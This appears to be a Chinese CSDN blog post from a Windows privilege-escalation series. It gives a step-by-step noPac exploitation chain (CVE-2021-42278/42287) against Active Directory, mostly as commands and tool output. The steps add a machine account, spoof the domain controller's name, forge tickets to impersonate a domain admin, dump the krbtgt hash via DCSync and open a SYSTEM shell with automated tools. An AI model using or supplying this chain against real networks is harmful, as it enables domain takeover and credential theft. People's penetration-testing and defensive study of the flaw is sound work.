WEB渗透Win提权篇-AccountSpoofing

已于 2024-08-27 19:50:34 修改
阅读量290 收藏
点赞数 2
分类专栏: 渗透测试 文章标签: 渗透测试 WEB渗透 网络安全 WEB安全 windows
于 2024-08-25 20:36:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_59468567/article/details/141534464
版权

  提权工具合集包(免费分享): 夸克网盘分享

 往期文章

WEB渗透Win提权篇-提权工具合集-CSDN博客

WEB渗透Win提权篇-RDP&Firewall-CSDN博客

WEB渗透Win提权篇-MSSQL-CSDN博客

WEB渗透Win提权篇-MYSQL-udf-CSDN博客

WEB渗透Win提权篇-AccountSpoofing-CSDN博客

WEB渗透Win提权篇-弱权限提权-CSDN博客

WEB渗透Win提权篇-PowerUp-CSDN博客

 

需要MachineAccountQuota > 0
检查账户的MachineAccountQuota
>crackmapexec ldap 10.10.10.10 -u username -p 'Password123' -d 'domain.local' --kdcHost 10.10.10.10 -M MAQ
>StandIn.exe --object ms-DS-MachineAccountQuota=*
检查DC是否存在漏洞
>crackmapexec smb 10.10.10.10 -u '' -p '' -d domain -M nopac
EXPLOIT
添加计算机账户
impacket@linux> addcomputer.py -computer-name 'ControlledComputer$' -computer-pass 'ComputerPassword' -dc-host DC01 -domain-netbios domain 'domain.local/user1:complexpassword'

powermad@windows> . .\Powermad.ps1
powermad@windows> $password = ConvertTo-SecureString 'ComputerPassword' -AsPlainText -Force
powermad@windows> New-MachineAccount -MachineAccount "ControlledComputer" -Password $($password) -Domain "domain.local" -DomainController "DomainController.domain.local" -Verbose

sharpmad@windows> Sharpmad.exe MAQ -Action new -MachineAccount ControlledComputer -MachinePassword ComputerPassword
清除被控机器账户的servicePrincipalName 属性
impacket@linux> addspn.py -u 'domain\user' -p 'password' -t 'ControlledComputer$' -c DomainController

powershell@windows> . .\Powerview.ps1
powershell@windows> Set-DomainObject "CN=ControlledComputer,CN=Computers,DC=domain,DC=local" -Clear 'serviceprincipalname' -Verbose
(CVE-2021-42278) 将受控机器帐户 sAMAccountName 更改为域控制器的名称,不带尾随 $
impacket@linux> renameMachine.py -current-name 'ControlledComputer$' -new-name 'DomainController' -dc-ip 'DomainController.domain.local' 'domain.local'/'user':'password'

powermad@windows> Set-MachineAccountAttribute -MachineAccount "ControlledComputer" -Value "DomainController" -Attribute samaccountname -Verbose
为被控机器申请TGT
impacket@linux> getTGT.py -dc-ip 'DomainController.domain.local' 'domain.local'/'DomainController':'ComputerPassword'

cmd@windows> Rubeus.exe asktgt /user:"DomainController" /password:"ComputerPassword" /domain:"domain.local" /dc:"DomainController.domain.local" /nowrap
充值被控账户的sAMAccountName 到旧值
impacket@linux> renameMachine.py -current-name 'DomainController' -new-name 'ControlledComputer$' 'domain.local'/'user':'password'

powermad@windows> Set-MachineAccountAttribute -MachineAccount "ControlledComputer" -Value "ControlledComputer" -Attribute samaccountname -Verbose
(CVE-2021-42287) 通过出示之前获得的 TGT 向 S4U2self 请求服务票证
impacket@linux> KRB5CCNAME='DomainController.ccache' getST.py -self -impersonate 'DomainAdmin' -spn 'cifs/DomainController.domain.local' -k -no-pass -dc-ip 'DomainController.domain.local' 'domain.local'/'DomainController'

cmd@windows> Rubeus.exe s4u /self /impersonateuser:"DomainAdmin" /altservice:"ldap/DomainController.domain.local" /dc:"DomainController.domain.local" /ptt /ticket:[Base64 TGT]
DCSync
DCSync: KRB5CCNAME='DomainAdmin.ccache' secretsdump.py -just-dc-user 'krbtgt' -k -no-pass -dc-ip 'DomainController.domain.local' @'DomainController.domain.local'
自动exploit
https://github.com/cube0x0/noPac
>noPac.exe scan -domain htb.local -user user -pass 'password123'
>noPac.exe -domain htb.local -user domain_user -pass 'Password123!' /dc dc.htb.local /mAccount demo123 /mPassword Password123! /service cifs /ptt
>noPac.exe -domain htb.local -user domain_user -pass "Password123!" /dc dc.htb.local /mAccount demo123 /mPassword Password123! /service ldaps /ptt /impersonate Administrator
https://github.com/WazeHell/sam-the-admin
>python3 sam_the_admin.py "caltech/alice.cassie:Lee@tPass" -dc-ip 192.168.1.110 -shell
[*] Selected Target dc.caltech.white                                              
[*] Total Domain Admins 11                                                        
[*] will try to impersonat gaylene.dreddy                                         
[*] Current ms-DS-MachineAccountQuota = 10                                        
[*] Adding Computer Account "SAMTHEADMIN-11$"                                     
[*] MachineAccount "SAMTHEADMIN-11$" password = EhFMT%mzmACL                      
[*] Successfully added machine account SAMTHEADMIN-11$ with password EhFMT%mzmACL.
[*] SAMTHEADMIN-11$ object = CN=SAMTHEADMIN-11,CN=Computers,DC=caltech,DC=white   
[*] SAMTHEADMIN-11$ sAMAccountName == dc                                          
[*] Saving ticket in dc.ccache                                                    
[*] Resting the machine account to SAMTHEADMIN-11$                                
[*] Restored SAMTHEADMIN-11$ sAMAccountName to original value                     
[*] Using TGT from cache                                                          
[*] Impersonating gaylene.dreddy                                                  
[*]     Requesting S4U2self                                                       
[*] Saving ticket in gaylene.dreddy.ccache                                        
[!] Launching semi-interactive shell - Careful what you execute                   
C:\Windows\system32>whoami                                                        
nt authority\system 
https://github.com/ly4k/Pachine
>python3 pachine.py -dc-host dc.predator.local -scan 'predator.local/john:Passw0rd!'
>python3 pachine.py -dc-host dc.predator.local -spn cifs/dc.predator.local -impersonate administrator 'predator.local/john:Passw0rd!'
>export KRB5CCNAME=$PWD/administrator@predator.local.ccache
>impacket-psexec -k -no-pass 'predator.local/administrator@dc.predator.local'
Pluto-2003
关注
专栏目录
渗透测试-web渗透.pdf
02-25
《Metasploit渗透测试魔鬼训练营》读书笔记文档,是在我看书的过程中对书中理论和一些实践的总结。
超全的Web渗透自我学习资料合集(64).zip
09-30
超全的Web渗透学习资料合集,共64web渗透: web安全原则 web渗透: web渗透测试清单 web渗透: 自动化漏洞扫描 web渗透: Google Hacking web渗透: web服务器指纹识别 web渗透: 枚举web服务器应用 web渗透: 识别...
【推荐】渗透测试工程师(CISP-PTE)认证培训课件资料合集(18份).zip
11-29
004-Web安全基础0 - 介绍.pptx 005-Web安全基础1 - HTTP协议.pptx 006-Web安全基础2 - 注入漏洞.pptx 007-Web安全基础3 - XSS漏洞.pptx 008-Web安全基础4 - 请求伪造漏洞.pptx 009-Web安全基础5 - 文件处理漏洞.pptx...
Acunetix Web Vulnerability Scanner-v15.0.221007170 Win
10-29
AWVS是一款常用的漏洞扫描工具,全称为Acunetix Web Vulnerability Scanner,它能通过网络爬虫测试你的网站安全,检测流行安全漏洞,大大提高了渗透效率。
渗透测试Web安全课程-视频教程网盘链接提取码下载 .txt
03-01
现在谈起安全方面,对Web进行渗透测试的攻击面、攻击角度相对于以前静态Web会差别很大,以前仅是针对Web server,现在都是针对应用程序本身代码部分漏洞的发现,目前的Web攻击类型有数百种,本课程着重讲解典型的几...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8531
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
代码随想录之链表刷题总结
Lllongroad的博客
10-31 749
代码随想录之链表刷题总结
内核上项目【远程call】
qq_45844442的博客
10-31 378
本次项目代码量过多,但思路相对简单,主要功能为挂起目标主线程,将主线程TrapFrame的rip进行修改跳转到指定的shellcode位置,该ShellCode我写的是弹出MessageBox,然后再恢复线程,最后创建一个工作队列,让系统将我们的ShellCode等痕迹进行清除,因为我只写了关于64位的进程操作,如果是操作32位进程,要在定位到Context结构,进而修改eip。
DataMining-FP-Growth算法Java实现
m0_73249076的博客
10-31 254
DataMining,FPGrowth算法Java实现
Vant 4官网例子使用与setup语法糖冲突解决方法
ededabo的博客
10-31 352
官网的数据处理部分使用export暴露函数写的这与 setup语法糖有冲突。冲突的原因是setup语法糖已经帮我们对数据进行暴露处理了。这个是轮播图的处理例子,其他带数据的组件都可以这样处理。然后引用组件就可以愉快的玩耍了。去除外层暴露函数及返回。例子:弹幕组件的使用。
(实战)WebApi第9讲:EFCore性能优化(IQueryable延迟查询、取消跟踪机制)
weixin_54966200的博客
10-31 582
ToList()在下图绿色框内。
链表逆置相关算法题|原地逆置|轮转链表|循环链表逆置(C)
ChoSeitaku的博客
11-03 414
将n初始化为1,cur指向L,cur的next指向第一个节点,往后遍历直到cur的next指向NULL,cur指向最后一个节点。一个工作指针cur用来遍历链表,一个后继指针用来保存cur的下一个节点,一个前驱指针prev用来保存前一个节点。然后找到新链表的尾节点,为原链表的第n-k个节点,令L指向新链表尾节点的下一个节点,并将环断开,得到新链表。将prev指向cur,cur指向next,next指向next的下一个,三个指针往后走一步。将cur的next指向perv,将中间节点的next指向前一个节点。
驱动——线程断链和信息获取
weixin_48257887的博客
10-31 303
实验环境:win7 x32。
java开发常用工具类
810cheng
10-31 270
java常用工具类收集
sicp每日一题[2.63-2.64]
再思的博客
10-31 1088
b. 对于 tree->list-1,因为 append 需要花费线性时间,所以T(n) = 2 * T(n/2) + O(n/2),时间复杂度为 O(n * log n);对于 tree->list-2,T(n) = 2*T(n/2) + O(1),时间复杂度为 O(n),第二个增长的慢一些。所以 T(n) = 2T(n/2) + O(1),根据 Master theorem,a=2, b=2, f(n) = O(1) = O(n^0), 即 c=0.则 T(n) = O(n),具体计算方法参考这
Java8 新特性 —— Stream API 详解
m0_74620530的博客
10-31 1061
Stream作为Java 8的一大亮点,它专门针对集合的各种操作提供各种非常便利、简单、高效的API,Stream API主要是通过Lambda表达式完成,极大的提高了程序的效率和可读性,同时Stram API中自带的并行流使得并发处理集合的门槛再次降低,使用Stream API编程无需多写一行多线程的代码就可以非常方便的写出高性能的并发程序。使用Stream API能够使代码更加优雅。
Java集合使用注意事项总结
Wzideng@qq.com
10-31 354
/class java.util.ArrayList 2、最简便的方法 List list = new ArrayList(Arrays.asList("a", "b", "c")) 3、使用 Java8 的 Stream(推荐) Integer [] myArray = { 1, 2, 3 };方法的可读性更好,并且时间复杂度为 O(1)。
Bypassuac之白名单结合注册表方式
最新发布
DamnVanish的博客
11-03 460
参考本章记录一下系统白名单文件结合注册表bypassuac,uac这个东西并不是Windows设置的防御机制而是相当于保护机制,只是用来控制用户行为的,弹个窗来提醒一下用户的行为,和直接的杀软是不一样的性质,所以uac有多种方式绕过比如系统白名单、DLL 劫持绕过、COM 劫持绕过、利用系统漏洞绕过甚至如果直接提权到高权限也相当于直接绕过了uac。
红米K70至尊版修复“nv损坏”主板电阻图示 mtk芯片工程固件刷写与步骤说明
小马哥的专栏
10-31 214
💝💝💝红米K70至尊版 机型代码:rothko,搭载天玑9300+旗舰芯片.后置5000万像素索尼IMX906高动态OIS主摄,800万像素超广角镜头,200万像素微距镜头,前置2000万像素摄像头,也适用于以下型号的小米机型:2407FPN8EG,2407FPN8ER,XIG06,A402XM,2407FRK8EC。 💝💝💝通过博文了解 1💝💝💝-----此机型工程固件的资源刷写注意事项 2💝💝💝-----此机型刷写工程固件预览界面 3💝💝💝------红米K
upload-labs靶场:WEB渗透文件上传漏洞21关系统学习
资源摘要信息: "upload-labs" 是一个专注于文件上传漏洞的WEB渗透测试练习平台。在这个靶场中,参与者将会面对一系列精心设计的挑战关卡,目的是为了帮助新手理解和掌握文件上传漏洞的攻击和防御技术。 知识点详细...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Pluto-2003

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值